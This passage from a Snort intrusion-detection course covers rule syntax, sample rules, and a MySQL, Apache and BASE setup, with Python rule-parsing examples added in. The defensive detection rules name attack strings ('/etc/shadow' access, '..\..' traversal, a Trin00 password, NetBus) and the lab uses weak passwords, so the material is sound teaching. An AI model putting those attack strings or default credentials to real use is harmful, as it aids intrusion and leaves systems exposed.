Unusual-client-port-connection   A network client was using an unusual port.              Medium
Icmp-activity                    Generic ICMP event.                                      Low
Network-scan                     Detection of a network scan.                             Low
Here is an example rule with the addition of these new options:
alert tcp $EXTERNAL_NET any -> 192.168.10.1 80 (msg:"Sample web access alert"; classtype:web-application-activity; reference:url,http://www.securitycertified.net; sid:10000023; rev:2;)
Walking through this rule from the beginning: This is an alert rule, looking at TCP as the protocol. It is designed to alert on traffic from the external network on any port to the machine at 192.168.10.1 on port 80. There is a simple message that states Sample web access alert, and the classtype has been defined as the built-in web-application-activity. As a reference for more information, a URL has been given, www.securitycertified.net, and this is the second revision of the rule, which has a Snort Rule ID of 10000023.
Rule Payload
The core of many IDSes is to examine the actual contents, or payload, of each packet. Snort can look inside the packet at the payload details to make a determination about that specific packet. There are many options for Snort here, and in this lesson, you will focus on a few specific options.
Content Keyword
In Snort, the Content keyword might be the most important of all the keywords. The Content keyword is how you define the specific content inside the packet's payload that Snort should look at for rule matching. A critical issue to keep in mind when defining content is that the data can be either text or binary data. Your binary data is normally provided in bytecode format, and it is enclosed within the pipe ( | ) character. Bytecode is a way of representing binary data in hexadecimal format.
When you enter your content information, if you require the : character, such
as in a URL, use instead the |3a| notation. Using the : character in content
matching will cause problems because the : character is used after each
keyword.
Other Keywords
The nocase keyword simply tells Snort to ignore case when looking into a packet. Nocase is a modifier, used after the content keyword.
The depth keyword tells Snort how far into a packet it should look to find the pattern, or content match. If you inserted a value of 5 here, then Snort would only look for the pattern within the first 5 bytes of the packet payload. Like nocase, the depth keyword is a modifier used after the content keyword.
The offset keyword tells Snort to ignore a defined number of bytes before looking into a packet. If you inserted a value of 5 here, then Snort would start to look for the pattern, or content match, after the first 5 bytes of packet payload. Offset is also a modifier and must be used after the content keyword.
Here is an example rule with the addition of these new options:
alert tcp $EXTERNAL_NET any -> 192.168.10.1 80 (msg:"Sample web access alert"; content:"http|3a|//www.securitycertified.net/test.cgi?id=r00t"; nocase; offset:2; classtype:web-application-activity; reference:url,http://www.securitycertified.net; sid:10000025; rev:2;)
This rule is the same as the previous example, with some additions. The first is the content keyword. This rule is looking for content that includes a URL with id=r00t in the payload. Note that the : character you would normally put in a URL has been replaced with the |3a| notation. You cannot use the : character inside the content keyword. This rule is skipping case sensitivity and is ignoring the first 2 bytes of each payload. Lastly, as this is a different rule, there is a different sid assigned.
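The content, nocase, offset and depth behaviour just described, as an added example (not the book's or Snort's own matcher) run over constructed payloads; it also shows the case where offset:2 prevents a match because the URL begins at byte 0 of the payload.

```python
"""Snort content matching with |hex| bytecode and the nocase, offset and depth
modifiers.  Added example with constructed payloads; a simplified
re-implementation, not Snort's own matcher."""


def decode_content(spec):
    """Turn a content string into bytes.  Text between pipe characters is
    hexadecimal bytecode: 'http|3a|//x' -> b'http://x'."""
    chunks = spec.split("|")
    if len(chunks) % 2 == 0:
        raise ValueError("unbalanced '|' in content %r" % spec)
    out = bytearray()
    for i, chunk in enumerate(chunks):
        out += bytes.fromhex(chunk) if i % 2 else chunk.encode("latin-1")
    return bytes(out)


def content_matches(payload, spec, nocase=False, offset=0, depth=None):
    """offset: skip that many payload bytes before searching.
    depth: how far to search, counted from the offset point; the whole pattern
    must fit inside that window, so depth:3 with content "GET" only fires when
    GET is the very first thing after the offset.
    nocase: compare case-insensitively."""
    pattern = decode_content(spec)
    window = payload[offset:] if depth is None else payload[offset:offset + depth]
    if nocase:
        pattern, window = pattern.lower(), window.lower()
    return pattern in window


def contents_match(payload, options):
    """Evaluate every content option of a rule, applying the nocase, offset
    and depth modifiers that follow each content keyword, in rule order.
    options: list of (keyword, value) pairs as they appear in the rule."""
    specs = []                                   # [[content, modifiers], ...]
    for keyword, value in options:
        if keyword == "content":
            specs.append([value, {}])
        elif keyword in ("offset", "depth") and specs:
            specs[-1][1][keyword] = int(value)
        elif keyword == "nocase" and specs:
            specs[-1][1]["nocase"] = True
    return all(content_matches(payload, spec, **mods) for spec, mods in specs)


# The content-related options of the sample rule above, in rule order.
SAMPLE_RULE_OPTIONS = [
    ("content", "http|3a|//www.securitycertified.net/test.cgi?id=r00t"),
    ("nocase", None),
    ("offset", "2"),
]

# Constructed sample payloads (not captured traffic).
PAYLOAD_PROXY_GET = b"GET HTTP://WWW.SecurityCertified.net/test.cgi?id=r00t HTTP/1.0\r\n"
PAYLOAD_URL_FIRST = b"http://www.securitycertified.net/test.cgi?id=r00t"
```

With the URL starting at byte 0, the offset of 2 cuts off "ht" and the rule does not fire; dropping the offset option makes the same payload match.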
The content keyword matches either text or binary data.
Flow Control
The flow keyword gives you the flexibility to define packets with Snort in terms of their direction between the client and the server. This option works on TCP streams, and there are several choices available if you wish to use the flow keyword. The following list identifies the flow control options, with a brief comment about each option:
to_client: This matches a server response to a client.
to_server: This matches a request from a client to a server.
from_client: This matches packets sent from the client. Similar function as the to_server option.
from_server: This matches packets sent from the server. Similar function as the to_client option.
only_stream: This matches only on reassembled stream packets.
no_stream: This does not match reassembled stream packets.
established: This matches on packets that are part of an established TCP connection.
stateless: This matches packets without regard to state.
While there is no one correct way to write a Snort rule, there are some general
guidelines that will make your writing more efficient and accurate. To start with,
you want to be as precise as possible with your content matching. This will cut
down on false matches and will cut down on the load on your system.
A second guideline is to create rules to match the vulnerability, not the specic
exploit. Writing rules that look for matches to the vulnerability will allow your
IDS to still match traffic, even if an attacker makes a modication to the exploit.
Pre-configured Rules
It is vital that you know how to create rules for Snort, but no one wants to build
something from scratch when it is already available and you can get it with very
little effort. The same thought applies for basic rules for Snort. The default Snort
installation comes with a selection of IDS rules for you to pick through and use,
and there are several more available for download at www.snort.org.
There are several options for you to choose from when you wish to receive Snort rules. If you need to have real-time rules, with the most current options available, you must become a subscriber to receive the Sourcefire VRT-certified rules. The Subscriber rules are the ones you need if you are looking to address security issues as they arise, often with a new rule available within days of a new vulnerability being introduced.
The second method to download pre-configured rules is to become a registered user at www.snort.org. Registered users are able to receive all the latest Snort rules, but the rules are available 30 days after they are made available to Sourcefire subscribers.
The third way to download pre-configured rules from Snort is as an unregistered user. Unregistered users are able to download the ruleset that is available with every major Snort release.
In addition to the rules that are available from Snort, there are rules available from www.bleedingsnort.com. The bleedingsnort.com rules are very current and are submitted by people all over the net. If you need absolute up-to-the-minute, experimental, and test rules, this is the location to find them.
In this lesson, you will work with Snort rules that are made available to everyone
(unregistered) from www.snort.org.
TASK 8C-3
Examining Pre-configured Rules
1. Navigate to C:\Tools\Lesson8\Rules.
2. Copy all the .rules les to the C:\Snort\rules folder.
3. Navigate to the C:\Snort\rules folder.
4. Open the folder, and browse through the pre-configured rules. You will come back to these files in a moment.
Examine Denial of Service Rules
As you can see, there are many very detailed default rules for you to work with. One section of the pre-configured rules deals with Denial of Service attacks. Here is a sample rule from this file:
alert tcp $EXTERNAL_NET any -> $HOME_NET 27665 (msg:"DDOS Trin00 Attacker to Master default startup password"; flow:established,to_server; content:"betaalmostdone"; reference:arachnids,197; classtype:attempted-dos; sid:233; rev:3;)
Starting at the beginning of this rule, you can see that it is an alert, matching tcp as the protocol. Snort will be looking at traffic from the external network on any port, going to the internal network on port number 27665. This rule is looking for an established TCP connection, with traffic going to the server. The content is listed as: betaalmostdone. Since this incident would be an attempt at denial of service, this rule is appropriately given the classtype of attempted-dos. It has a reference you can check in the Arachnids database, number 197 (Arachnids was an incident database; more current data is found on the CVE list), has been given a Snort rule ID of 233, and this is the third revision of the rule.
TASK 8C-4
Examining DDoS Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the ddos.rules file with WordPad.
3. Based on these rules, what three ports does the DDoS tool Trin00 utilize?
UDP 31335, TCP 27665, and UDP 27444.
4. Based on these rules, what icmp_id numbers does the DDoS tool
Stacheldraht utilize?
Icmp_ids: 666, 667, 668, 669, 1000, 6666, 6667.
Examine Backdoor Rules
Just as there are pre-configured rules for Distributed Denial of Service, there are extensive rules designed for matching backdoor attacks. These rules will generally be more complex than a DoS rule because the content matching often requires more information. Here is a sample rule from the backdoor.rules file:
alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any
(msg:"BACKDOOR netbus active";
flow:from_server,established; content:"NetBus";
reference:arachnids,401; classtype:misc-activity;
sid:109; rev:5;)
This rule is an alert looking for matches on the TCP protocol. In this case, it is traffic from your internal network on port 12345 or 12346 to the external network on any port. The NetBus server actually resides on the compromised host, in this case inside your network. The traffic flow is from the server (the compromised host), and it is an established connection. The content that is being looked for is NetBus. This alert is characterized as misc-activity, has a Snort rule ID of 109, and is the fifth revision of the rule.
TASK 8C-5
Examining Backdoor Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the backdoor.rules file with WordPad.
3. Based on this rule set, what service and port are the majority of the Linux rootkit attempts using?
Telnet, on port 23.
4. Is the second Subseven rule with SID 107 looking for an attempt to
place a Trojan on a computer in your network or looking for evidence
that a Trojan has already been placed on a computer in your network?
Looking for evidence that a Trojan is already in the network.
Examine Web Attack Rules
One of the fastest growing areas of attack is on web servers. Since these are exposed, they are often the targets of attacks from every skill level, from script kiddies to more experienced attackers. Snort has many rules designed to look for web attacks. Here is one example rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-ATTACKS /etc/shadow access";
flow:to_server,established; content:"/etc/shadow"; nocase;
classtype:web-application-activity; sid:1372; rev:5;)
This rule is an alert, looking at TCP traffic from the external network on any port to your web servers on your web server ports. The web servers and web server ports are defined in your variables. The flow of this traffic is to the web server, and it would be an established connection. The attacker is looking for the /etc/shadow file on a Linux/UNIX system. Case sensitivity is not taken into consideration with this rule (the nocase option). It has been given a Snort Rule ID of 1372, and is the fifth revision of the rule. This specific rule lists the classtype as web-application-activity, but you might want to consider this potentially a recon event.
TASK 8C-6
Examining Web Attack Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the web-attacks.rules file.
3. Which rule is watching for an attacker adding a user account to the
administrators group?
SID 1357.
4. In SID 1335, an attacker would send the command /bin/kill. What operating system is the web server likely running?
Linux/UNIX.
5. Many of these rules contain the %20 characters. What does this
mean?
This means that the Snort rule is looking to match a space where the
%20 resides in the content portion of the rule.
If you have an older rule set, your web attack rules may vary.
Examine Web IIS Rules
As the Microsoft IIS Web Server grows in popularity, the attacks seem to grow
exponentially. Because of this, there is a ruleset dedicated to rules for the IIS
Server. Here is one example of an IIS Rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS
$HTTP_PORTS (msg:"WEB-IIS Directory transversal
attempt"; flow:to_server,established;
content:"..|5C|.."; reference:bugtraq,2218;
reference:cve,1999-0229;
classtype:web-application-attack; sid:974; rev:10;)
This rule addresses a rather famous exploit where a person could simply put a line in the URL that would give them access to the computer. This is called the Directory Traversal Attack, where the attacker uses ../.. in the URL as part of the attack.
In this rule, the alert is acting on TCP traffic from the external network on any port towards the web servers on web server ports. The connection must be established and is in the direction towards the server. The key point in this rule is the content of ..|5C|.. This would be a double-dot, then a backslash, then a double-dot sent to the server. Since the byte is written in hex, the rule has the pipe symbol, 5C, then the pipe symbol, as the backslash is 0x5C in ASCII. This is classified as a web attack, has a Snort ID of 974, and is the tenth revision of the rule.
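As an added example (not code from the course or from the Snort project), the following Python parser reads the rule header and option syntax quoted in this lesson, decodes the |5C| hex escape into the backslash byte, and checks a rule's content and nocase options against a constructed payload. The rule strings are copied from the lesson's rule files; the payloads are constructed for the example.

```python
"""Parse Snort 2.x rules like those quoted in this lesson and check their
content options against a payload. Added example, not course or Snort code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Rule header: action proto src sport direction dst dport (options)
HEADER_RE = re.compile(
    r"^\s*(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$",
    re.S,
)

# Two sample rules quoted in this lesson, joined onto one line each.
IIS_RULE = ('alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS '
            '(msg:"WEB-IIS Directory transversal attempt"; flow:to_server,established; '
            'content:"..|5C|.."; reference:bugtraq,2218; reference:cve,1999-0229; '
            'classtype:web-application-attack; sid:974; rev:10;)')
WEB_RULE = ('alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS '
            '(msg:"WEB-ATTACKS /etc/shadow access"; flow:to_server,established; '
            'content:"/etc/shadow"; nocase; classtype:web-application-activity; '
            'sid:1372; rev:5;)')

@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    msg: str = ""
    flow: List[str] = field(default_factory=list)
    contents: List[List] = field(default_factory=list)  # [pattern_bytes, nocase]
    references: List[Tuple[str, str]] = field(default_factory=list)
    classtype: str = ""
    sid: Optional[int] = None
    rev: Optional[int] = None

def decode_content(text: str) -> bytes:
    """Bytes for a content string: text outside |...| is literal, text inside
    is hex, so "..|5C|.." becomes b"..\\.." (0x5C is the backslash)."""
    out = bytearray()
    for i, part in enumerate(text.split("|")):
        out += part.encode("latin-1") if i % 2 == 0 else bytes.fromhex(part)
    return bytes(out)

def split_options(opts: str) -> List[Tuple[str, Optional[str]]]:
    """Split 'key:value; flag; ...' on semicolons that are not inside quotes."""
    items, buf, in_quote = [], [], False
    for ch in opts:
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            items.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    items.append("".join(buf))
    result = []
    for item in (i.strip() for i in items if i.strip()):
        key, sep, val = item.partition(":")
        result.append((key.strip(), val.strip().strip('"') if sep else None))
    return result

def parse_rule(line: str) -> Rule:
    m = HEADER_RE.match(line)
    if not m:
        raise ValueError("not a Snort rule: " + line[:40])
    r = Rule(m["action"], m["proto"], m["src"], m["sport"],
             m["dir"], m["dst"], m["dport"])
    for key, val in split_options(m["opts"]):
        if key == "msg":
            r.msg = val
        elif key == "flow":
            r.flow = [f.strip() for f in val.split(",")]
        elif key == "content":
            r.contents.append([decode_content(val), False])
        elif key == "nocase" and r.contents:  # modifier for the preceding content
            r.contents[-1][1] = True
        elif key == "reference":
            system, _, ident = val.partition(",")
            r.references.append((system, ident))
        elif key == "classtype":
            r.classtype = val
        elif key in ("sid", "rev"):
            setattr(r, key, int(val))
    return r

def content_matches(rule: Rule, payload: bytes) -> bool:
    """True when every content pattern occurs in the payload, honouring nocase
    (header, flow and preprocessor checks are out of scope here)."""
    for pattern, nocase in rule.contents:
        hay, needle = (payload.lower(), pattern.lower()) if nocase else (payload, pattern)
        if needle not in hay:
            return False
    return True
```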
TASK 8C-7
Examining IIS Rules
1. Navigate to the C:\Snort\rules folder.
2. Open the web-iis.rules file with WordPad.
3. The Code Red exploit has .ida? in the payload. Which SID would you
look up online for more information about the rule to match Code Red
attacks?
SID 1243.
4. The Code Red II exploit attempted to use /root.exe and has a Snort Rule
ID of 1256. If you wanted to learn more about this exploit, what URL
would you use to find more information about Code Red?
www.cert.org/advisories/CA-2001-19.html
Topic 8D
Configuring Snort to Use a Database
Snort Output Plug-ins
By now you can see that Snort will be able to generate large volumes of data in the form of alerts, logs, and so on. Reading this data on screen while Snort is running isn't realistic, so you will need to use some means of reading the data that Snort collects.
Snort provides several output options through the use of output plug-ins. In this section, you will configure Snort to output information to a MySQL database. Snort is not limited to using a MySQL database; that is simply the choice for this lesson. You could output Snort to Oracle, SQL Server, any UNIX ODBC-compliant database, and so on.
In addition to sending logs and alerts to a database, you could instruct Snort to send this data to a remote logging server via Syslog. This is the command to output locally in Syslog format:
output alert_syslog: LOG_LOCAL2 LOG_ALERT
If you wish to send this data to a remote server, you will need to replace the local information with the remote server information.
Another option, if you desire, is to output directly in a binary format that
tcpdump works well with. This is the command to output in tcpdump format:
output log_tcpdump: snort.dump
In the snort.conf file, you will configure the type of output you wish to use. Remember, the output is detailed in the snort.conf file, not with a command-line switch. For this lesson, you will be configuring the system to output to a database. The following example shows what a basic entry for database logging would look like in the snort.conf file:
output database: log, mysql, user=username password=password dbname=snortdb host=localhost
Configure Snort to Use a Database
Since you are going to configure a MySQL database to accept data, you must inform Snort about the database and give it the information required to make the connection. In the following task, you will reconfigure the snort.conf file to include the output to the database.
TASK 8D-1
Editing Snort.Conf
1. Navigate to the C:\Snort\etc folder.
2. Open the snort.conf file with WordPad.
3. Scroll down in the file to the Output database plug-in section.
4. Add the following line:
output database: log, mysql, user=snort password=snortpass dbname=snortdb1 host=localhost
5. Save and close the snort.conf file.
Installing MySQL for Snort
In order for Snort to utilize a database, you must build one. In this lesson you
will work with the freely available and widely popular MySQL database. Keep in
mind that Windows, Snort, and MySQL can take a lot of computing resources on
a busy network, so a dedicated machine with a good processor and lots of
memory would be a good base platform.
TASK 8D-2
Installing MySQL
1. Navigate to the C:\Tools\Lesson8 folder.
2. Double-click the mysql-essentials-5.0.27-win32.msi le.
3. In the Welcome screen, click Next.
4. Select the Custom radio button and click Next.
5. Click the Change button. You are going to install to a location you choose.
6. In the Folder Name text box, type C:\Snort\mysql and click OK, and then
click Next.
7. Verify the install directory location and click Install.
8. Once MySQL is installed, select the Skip Sign-Up radio button and click
Next.
9. Verify that the Configure MySQL Server Now check box is checked, and click Finish.
10. In the Welcome screen, click Next.
11. Select the Standard Configuration radio button, and click Next.
12. Check the Include BIN Directory In Windows PATH check box, and click Next. (Note: leave the box checked next to Install As Windows Service.)
13. In the Root Password and the Confirm text boxes, type and re-type sqlpass. Do not check the box to Enable Root Access or Create An Anonymous Account, and then click Next.
14. To start the conguration, click Execute, and then click Finish to end the
installation.
With MySQL now installed with the base configuration, you will need to create the actual database that Snort is going to work with. In the following task, you will use both the MySQL command line and the Snort command line. Snort comes with a script to build the database in MySQL, complete with the appropriate tables. This script was generated during the install of Snort. If you recall, you had the option to define the database/logging that you would use, and you selected the option that included support for MySQL.
TASK 8D-3
Creating the Snort Database
1. Navigate to the C:\Snort\schemas directory. Note the file create_mysql. This is the file you will use to build the database.
2. Choose Start→All Programs→MySQL→MySQL Server 5.0→MySQL Command Line Client.
3. Enter your MySQL root password. Note: This should be sqlpass from
the previous task.
4. Enter create database snortdb1;
5. Enter show databases;
6. Verify that your two new databases are listed.
7. To switch to the new database, enter connect snortdb1;
8. To populate the database, enter source
C:\Snort\schemas\create_mysql
9. To show the tables that were created during the execution of the previous
script, enter show tables;
10. At the mysql> prompt, enter quit;
MySQL User Accounts
MySQL needs several user accounts for the full functionality of this lesson. You will need to configure the accounts so that MySQL will accept the data that Snort is sending, and so that later, if you use an analysis program such as BASE (which you will see later), it can connect to the database to pull the required data.
TASK 8D-4
Creating MySQL User Accounts
1. Choose Start→All Programs→MySQL→MySQL Server 5.0→MySQL Command Line Client.
2. Enter your MySQL root password. Note: This should be sqlpass.
3. At the mysql> prompt, enter show databases;
4. Enter grant INSERT,SELECT,UPDATE on snortdb1.* to snort identified by 'snortpass';
5. Enter grant INSERT,SELECT,UPDATE on snortdb1.* to snort@localhost identified by 'snortpass';
6. Enter flush privileges;
7. Enter exit;
8. Navigate to the C:\Snort\mysql folder.
9. Right-click my.ini and open the file with WordPad.
10. Change the following line:
Before:
sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION"
After:
sql-mode="NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION"
11. Save and close the my.ini file.
Snort to Database Connectivity
Now that you have a database installed and have configured Snort to communicate with the database, you need to test this connectivity. The following quick task is a simple loading of the snort.conf file to check whether the connection to the database is functional. You do not want to go further in your configuration if you are unable to get the connection between MySQL and Snort to function.
TASK 8D-5
Testing the New Configuration
1. Open a command prompt.
2. Navigate to the C:\Snort\bin folder.
3. Enter snort -d -e -v -iX (remember to change X to use your network interface as before).
4. Watch to see that Snort is functional and is showing packets on screen.
If you need to generate network traffic, ping a neighbor computer.
5. Press Ctrl+C to end Snort.
6. To see the full Snort system running, enter snort -d -e -v -iX -c
C:\Snort\etc\snort.conf -l C:\Snort\log
7. Press Ctrl+C to stop Snort.
8. To see where Snort made the connection to the database, scroll back through the output.
Snort as a Service
While it may work for you to manually start and stop Snort to perform the occasional packet capture, in a working environment you will likely want Snort on all the time. One way to achieve this is to install Snort as a service in Windows. The following task will walk you through the steps of adding the service, and then verifying that it starts automatically.
TASK 8D-6
Configuring Snort as a Service
1. Open a command prompt.
2. Navigate to the C:\Snort\bin folder.
3. At the C:\Snort\bin> prompt, enter snort /SERVICE /INSTALL -c
C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii -iX
(Remember to change X to use your network interface as before.)
You will receive a prompt that the SNORT_SERVICE has been successfully
installed.
4. Close the command prompt.
5. Choose StartAdministrative ToolsServices.
6. In the right pane, scroll down to and double-click the Snort service.
If you receive a winpcap error, you can try using winpcap_3_1.exe.
7. In the Startup Type, change the setting from Manual to Automatic.
8. Click Apply.
9. To close the Snort Properties window, click OK. Do NOT click Start at this
time.
10. Close the Services window.
11. To verify that the Snort service starts automatically, restart your server.
12. When the server restarts, log on as Administrator.
13. Right-click the taskbar and choose Task Manager.
14. Select the Processes tab, and verify that both Snort and mysql are
started and running.
15. Select the Snort process, and note the amount of memory that is allocated to Snort. As you can see, Snort is a memory-intensive process.
16. Close the Task Manager.
Topic 8E
Running an IDS on Linux
LAMP On SuSe
While this lesson, up to this point, has focused on the use of Snort, in order to make the system more functional, you will need a system in place to read, sort, and view all the data that Snort is able to collect. In the previous section you saw how to set up Snort to interact with a MySQL database while running on a Windows system.
In this section, you will configure Linux with the background system to read the Snort data via a web browser. This requires the building of a LAMP server. LAMP stands for Linux, Apache, MySQL, and PHP (you may see the P also refer to Python or Perl, but in this case it is PHP). In addition to the LAMP components, you will install nmap, a tool you will use later in the lesson to generate network scanning traffic.
In SuSe Linux 10, many of the components required to build the environment for Snort are available and ready for installation. Other components will require you to connect to the Internet to get the current version. In this lesson, the specific versions are detailed. Please keep in mind that in the event that you use a different version, it is possible, and even likely, that these steps will not work.
TASK 8E-1
Installing LAMP Components
1. Log in to your Linux server as root.
2. From the Computer menu, choose Install Software.
3. In the Software list, scroll down and check the following check boxes:
lamp_server (i586)
nmap (i586)
php5-gd (i586)
php5-mysql (i586)
php5-mysqli (i586)
php5-pear (i586)
snort (i586)
webalizer (i586)
4. Verify that you have checked these components, and click Install.
5. The additional packages that are required for these components to run properly are listed. Review the list to see how many smaller pieces are required, and then click Apply.
6. If you are prompted for the Novell media, insert the CD or DVD now, and
click OK. Note: it may take several minutes to install these packages.
7. Once the les have been copied, you will see an Installation Was Successful
prompt. Click Close.
8. Close the Software Installer.
Apache and PHP
One of the critical components you just installed was PHP. PHP is a server-side scripting language. PHP is used to provide dynamic web page content to end users, without the end users having to install any new software on their system. The end user will connect to the server with a web browser, and the PHP scripting on the server's side will generate the response to deliver to the end user.
If you manually build your server, meaning if you install these components individually on their own rather than through the SuSe installer, you will need to configure Apache to use PHP. This is done by editing the httpd file and adding the line for your version of PHP. You would also need to edit the PHP configuration file. During the installation, a file called php.ini-dist will be installed, and you would rename this file to php.ini. In the php.ini file, you need to tell PHP where to find the PHP extensions and where to find a temporary directory. In this task, since you used the SuSe installer, these steps are taken care of and you will not need to manually configure the php.ini file.
In the following task, you will turn on your Apache server and verify that PHP is
properly installed and running. If your server does not reply with the test screen,
you must check your installation. Without a functional PHP and Apache Server,
you will not be able to complete the tasks in this topic.
TASK 8E-2
Apache and PHP Test
1. From the Computer menu, choose YaST.
2. On the left side, click System, and then click System Services (Runlevel).
3. Scroll down and highlight apache2.
4. Click Enable, and if you see a pop-up message about dependencies, click
Continue.
5. In the success pop-up, click OK.
6. To close the System Services window, click Finish.
7. To save the Runlevel changes, click Yes.
8. Close YaST.
9. From the Computer menu, choose Firefox.
10. In the address bar, enter http://localhost
11. If your server is running, you will get the message It works! If not, carefully repeat the installation steps.
12. Close the browser, and navigate to the /srv/www/htdocs directory.
13. Inside /srv/www/htdocs, create a new document named info.php
14. Right-click this document and open it with Gedit.
15. Enter <?php phpinfo(); ?> and then save and close the file. (Note: If you made your file using the File Manager, you must right-click and edit the permissions so that the Others group has read access.)
16. Open the web browser.
17. In the address bar, enter http://localhost/info.php
18. You will see a screen that presents all the local PHP information. This summary screen details the PHP install on your system.
19. Close the Web Browser.
Enable Snort on Linux
Now that you have verified that your web server is running, and you have verified that PHP is enabled and functional for your server, you can move on to the next section. In this section, you will configure Snort and enable MySQL. Previously, you configured these on Windows, so the steps should be familiar to you. First, you will configure Snort, then you will enable both Snort and MySQL in YaST.
The steps to enable these services are critical. If you forget to enable both Snort and MySQL under System Services, you can expect to run into some errors later in the topic!
TASK 8E-3
Configure Snort on Linux
1. Open your file browser, and navigate to /etc/snort.
2. To open the file with Gedit, double-click snort.conf.
3. Edit these lines in your snort.conf file:
var HOME_NET 172.X.0.0/16 (replace the X based on your address in the network)
var EXTERNAL_NET !$HOME_NET
var RULE_PATH /etc/snort/rules
output database: log, mysql, user=snort password=snortpass dbname=snortdb1 host=localhost
4. Save and close the file.
5. From the Computer menu, choose YaST.
6. Click System, then click System Services (Runlevel).
7. Scroll down, highlight mysql, and click Enable. Click Continue To
Enable The Dependencies, and then click OK.
8. Scroll down and highlight Snort, and click Enable. Note the message
prompt, and click OK.
9. Click Finish, and then click Yes to save the changes to the run levels, and
then close YaST.
Configuring MySQL on Linux
With the basic Snort configuration ready, next you must create the MySQL database for Snort to use. The script for building the database is included in Snort when Snort is compiled for use with a database. The default installation includes the scripts for a MySQL database.
Remember that when you work with MySQL, each of your commands ends with the ; character. If your install is not done on the SuSe platform with the software installer, the location of your Snort files will likely be different. In this task, you will assign a password to the root account, create and assign a password to the snort account, and build the database.
TASK 8E-4
Configuring MySQL for Snort
1. Open a Terminal.
2. Enter the following commands (press Enter after each command):
mysql
SET PASSWORD FOR root@localhost=PASSWORD('rootpass');
create database snortdb1;
grant ALL on root.* to snortdb1@localhost;
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snortdb1.*
to snort identified by 'snortpass';
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snortdb1.*
to snort@localhost identified by 'snortpass';
exit
mysql -u root -p
rootpass
connect snortdb1;
source /usr/share/doc/packages/snort/schemas/create_mysql;
show databases;
use snortdb1;
show tables;
3. If you see the table listing, with 16 rows, you have successfully created the database and you can proceed. If not, please follow this task again carefully; every step must be exact.
4. At the mysql> prompt, enter exit
5. Close the Terminal window.
Connecting Snort to a Database
Now that you have configured Snort to connect to the database, and you have configured the database to accept the connections from Snort, you should test this configuration. You do not want to get too far into this configuration only to find an error from the beginning.
Note that in the tasks here, you are issuing the full command syntax in Snort to
see the results on screen. In your production environment, you would most likely
not include the option to see this information on screen, as you would have little
use for seeing that information on screen.
In the following task, you will run a test to confirm that Snort can connect to the database. If you do not make the connection to the database, you must stop here and go back through the tasks to find the error. Once connected, you will exit the Snort process. At this time, do not leave Snort running.
TASK 8E-5
Testing Snort Connectivity to the Database
1. Open a Terminal window.
2. Enter snort -d -e -v -c /etc/snort/snort.conf -l
/var/log/snort
3. It may take a moment, but you should see Snort load and make the connection to the database. If you get an error message, verify that all the lines are correct in your snort.conf file and that your MySQL is configured properly.
4. Press Ctrl+Z to stop Snort. Scroll up to see where Snort made the con-
nection to the database.
5. Once successful, close the Terminal window.
Installing ADOdb and BASE
Since you have configured several components up to this point, now is a good time to review. First, you installed and configured Apache to start up. You then configured PHP to work with the server, and verified that PHP is working with a simple test page. Next, you configured Snort for your system, and configured MySQL to work with Snort by creating the appropriate database. Lastly, you ran a connectivity test to ensure that Snort can connect to the MySQL database that you created.
With those pieces in place, you are ready to install what is called the Basic
Analysis and Security Engine, or BASE for short. You use BASE through your
web browser to analyze the data that Snort is sending to your MySQL database.
The team at www.sourceforge.net describes BASE as follows: BASE is based
on the code from the Analysis Console for Intrusion Databases (ACID) project.
This application provides a web front-end to query and analyze the alerts coming
from a SNORT IDS system. ACID was the original web front-end for Snort
results and has evolved into BASE. ACID is still used by many organizations.
Another component you will need to download is called ADOdb. ADOdb is used by BASE with PHP to perform the actual queries of the Snort database. Since PHP's database access abilities are not standardized, there needs to be some means of access, and this is where ADOdb comes into play.
You will need to download two more parts for this section to be operational. These files have already been downloaded and are on the SCNS Course CD; the task will simulate the location you may download files to on your local computer. If you download new files, be sure you use the exact file names in this task; if not, it is possible that your BASE console will not function as expected. Here are the locations for these two files:
http://sourceforge.net/projects/adodb (this is where you can download ADOdb)
http://sourceforge.net/projects/secureideas (this is where you can download BASE)
TASK 8E-6
Downloading ADOdb and BASE
1. Open a Terminal window.
2. Enter the following commands:
cd /
mkdir download
cd /download
ls
cd /Tools/Lesson8
ls
cp adodb493a.gz /download
cp base-1.2.7.tar.gz /download
cd /download
ls
With these two files downloaded, you are now ready to install them. The install steps are straightforward; however, there is one configuration file for BASE that you will need to configure. This file, called base_conf.php, needs to know where your adodb is installed and needs to know how to connect to the Snort database you made in MySQL. In the following task, you will install these two files and configure the BASE php file.
TASK 8E-7
Installing ADOdb and BASE
1. Open a Terminal window.
2. Enter the following commands:
cd /download
cp adodb493a.gz /srv/www
cd /srv/www
tar -xvzf adodb493a.gz
rm -rf adodb493a.gz
cd /download
cp base-1.2.7.tar.gz /srv/www/htdocs
cd /srv/www/htdocs
tar -xvzf base-1.2.7.tar.gz
rm -rf base-1.2.7.tar.gz
mv base-1.2.7 base
cd /srv/www/htdocs/base
cp base_conf.php.dist base_conf.php
3. Once you have created the new base_conf.php file by copying it, you can close the Terminal window.
4. In the file browser, navigate to /srv/www/htdocs/base and open base_conf.php with Gedit.
Be sure you type these commands exactly.
5. Edit the file so that the following changes take place (the values are PHP strings, so they must be quoted):
$BASE_urlpath = '/base';
$DBlib_path = '/srv/www/adodb/';
$alert_dbname = 'snortdb1';
$alert_host = 'localhost';
